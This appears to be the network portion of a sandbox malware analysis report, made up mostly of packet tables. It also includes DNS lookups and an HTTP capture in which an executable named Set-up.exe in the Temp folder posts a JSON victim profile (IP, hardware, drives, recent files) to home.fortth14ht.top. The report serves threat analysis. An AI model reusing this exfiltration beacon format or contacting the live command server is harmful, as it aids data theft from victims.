Dec 27, 2024 08:40:47.439798117 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.439809084 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.439838886 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.439870119 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.439892054 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.439923048 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.439934969 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.439940929 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.440076113 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.440082073 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.440115929 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.440128088 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.440169096 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.547960997 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.547971964 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.547996044 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548034906 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.548057079 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548069000 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548089027 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548115015 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.548146009 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.548146963 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548157930 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548204899 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.548281908 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548293114 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548310995 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548321009 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548341990 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.548341990 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.548360109 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.548384905 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548413038 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548484087 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.548496962 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548513889 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548568964 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.548697948 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548710108 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548727989 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548768997 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.548798084 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548847914 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.548896074 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548917055 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548958063 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548966885 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.548974037 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.549019098 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.549043894 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.549084902 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.549137115 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.549191952 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.549204111 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.549253941 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.549263954 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.549274921 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.549313068 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.549444914 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.549463987 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.549514055 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.549606085 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.549616098 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.549633026 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.549643040 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.549684048 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.549736977 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.549747944 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.549771070 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.549782038 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.549902916 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.549912930 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.549973011 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.549983978 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550039053 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550071001 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550128937 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550143003 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550183058 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550235033 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550246000 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550290108 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550331116 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550363064 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550466061 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550477028 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550512075 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.550563097 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550575972 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550617933 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550713062 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550724983 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550765991 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550838947 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550849915 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550944090 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.550952911 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.551402092 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.555748940 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.555804014 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.555973053 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.555989981 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.557090998 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.557100058 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.557215929 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.557291985 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.557432890 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.557472944 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.557579041 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.557590008 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.557636023 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.557775974 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.557806015 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.557917118 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.557921886 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.558054924 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.558084965 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.558362961 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.558429003 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.558557034 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.558592081 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.558809996 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.558820009 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.558976889 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.559039116 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.559156895 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.559186935 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.559281111 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.559326887 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.559417009 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.559427977 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.559675932 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.559746027 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.559757948 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.559767962 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.559873104 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.559883118 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.559932947 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.559993982 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.560031891 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.560105085 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.560197115 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.560206890 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.560359001 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.667412043 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.667442083 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.667476892 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.667510986 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.667650938 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.667660952 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.667671919 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.667733908 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.667885065 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.667901993 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.668018103 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.668035984 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.668093920 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.668155909 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.668232918 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.668267012 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.668277025 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.668346882 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.668395996 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.668405056 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.668493986 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.668518066 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.668581963 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.668591976 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.668662071 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.668672085 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.669097900 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.672744989 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.672756910 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.672835112 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673166037 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673207045 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673218966 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673235893 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673247099 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673258066 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673276901 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673286915 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673296928 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673307896 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673320055 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673348904 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673372984 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673412085 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673506975 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673516989 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673691988 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673702955 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673758984 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673804045 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673814058 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673837900 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673880100 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673926115 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.673935890 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674019098 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674029112 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674094915 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674104929 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674231052 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674241066 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674277067 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674287081 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674413919 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674534082 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674645901 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674657106 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674665928 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674675941 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674695015 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674705029 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674714088 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674726009 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674813032 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674823046 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674894094 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674904108 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674978971 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.674989939 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.675080061 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.675088882 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.675223112 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.675232887 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.675242901 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.675252914 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.675328970 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.675339937 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.675421953 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.675463915 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.675560951 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.675570965 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.675601006 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.675642014 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.675728083 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.675736904 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.675808907 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.675982952 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.675992012 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.676023960 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.676034927 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.676044941 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.676059961 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.676090002 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.676100969 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.676119089 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.676130056 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.676290035 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.676412106 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.676491976 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:49.866419077 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:49.866580009 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:49.866672039 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:49.866748095 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:49.986219883 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:50.018091917 CET	49731	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:50.139333010 CET	80	49731	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:50.139419079 CET	49731	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:50.139712095 CET	49731	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:50.259119987 CET	80	49731	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:51.596936941 CET	80	49731	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:51.597264051 CET	49731	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:51.597392082 CET	80	49731	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:51.597464085 CET	49731	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:51.716737986 CET	80	49731	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:51.742038965 CET	49737	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:51.861561060 CET	80	49737	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:51.861702919 CET	49737	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:51.861974955 CET	49737	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:51.981607914 CET	80	49737	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:53.457509995 CET	80	49737	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:53.457672119 CET	80	49737	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:53.457742929 CET	49737	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:53.458003044 CET	49737	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:53.577436924 CET	80	49737	185.121.15.192	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 08:40:30.436992884 CET	62851	53	192.168.2.5	1.1.1.1
Dec 27, 2024 08:40:30.437062025 CET	62851	53	192.168.2.5	1.1.1.1
Dec 27, 2024 08:40:30.574621916 CET	53	62851	1.1.1.1	192.168.2.5
Dec 27, 2024 08:40:30.720860958 CET	53	62851	1.1.1.1	192.168.2.5
Dec 27, 2024 08:40:44.642664909 CET	54369	53	192.168.2.5	1.1.1.1
Dec 27, 2024 08:40:44.642712116 CET	54369	53	192.168.2.5	1.1.1.1
Dec 27, 2024 08:40:44.784832001 CET	53	54369	1.1.1.1	192.168.2.5
Dec 27, 2024 08:40:44.784915924 CET	53	54369	1.1.1.1	192.168.2.5
Dec 27, 2024 08:40:49.879671097 CET	51945	53	192.168.2.5	1.1.1.1
Dec 27, 2024 08:40:49.879718065 CET	51945	53	192.168.2.5	1.1.1.1
Dec 27, 2024 08:40:50.017263889 CET	53	51945	1.1.1.1	192.168.2.5
Dec 27, 2024 08:40:50.017471075 CET	53	51945	1.1.1.1	192.168.2.5
Dec 27, 2024 08:40:51.603708029 CET	51947	53	192.168.2.5	1.1.1.1
Dec 27, 2024 08:40:51.603840113 CET	51947	53	192.168.2.5	1.1.1.1
Dec 27, 2024 08:40:51.740894079 CET	53	51947	1.1.1.1	192.168.2.5
Dec 27, 2024 08:40:51.741491079 CET	53	51947	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 08:40:30.436992884 CET	192.168.2.5	1.1.1.1	0x67	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:40:30.437062025 CET	192.168.2.5	1.1.1.1	0x4fcd	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 27, 2024 08:40:44.642664909 CET	192.168.2.5	1.1.1.1	0x9895	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:40:44.642712116 CET	192.168.2.5	1.1.1.1	0xb1be	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 27, 2024 08:40:49.879671097 CET	192.168.2.5	1.1.1.1	0xb5d7	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:40:49.879718065 CET	192.168.2.5	1.1.1.1	0xe180	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 27, 2024 08:40:51.603708029 CET	192.168.2.5	1.1.1.1	0xb8e1	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:40:51.603840113 CET	192.168.2.5	1.1.1.1	0xb9df	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 08:40:30.574621916 CET	1.1.1.1	192.168.2.5	0x67	No error (0)	httpbin.org	34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:40:30.574621916 CET	1.1.1.1	192.168.2.5	0x67	No error (0)	httpbin.org	3.218.7.103	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:40:44.784832001 CET	1.1.1.1	192.168.2.5	0x9895	No error (0)	home.fortth14ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:40:50.017263889 CET	1.1.1.1	192.168.2.5	0xb5d7	No error (0)	home.fortth14ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:40:51.740894079 CET	1.1.1.1	192.168.2.5	0xb8e1	No error (0)	home.fortth14ht.top	185.121.15.192	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.fortth14ht.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49721	185.121.15.192	80	5880	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 08:40:44.906758070 CET	12360	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 471607 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 37 34 36 30 34 36 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 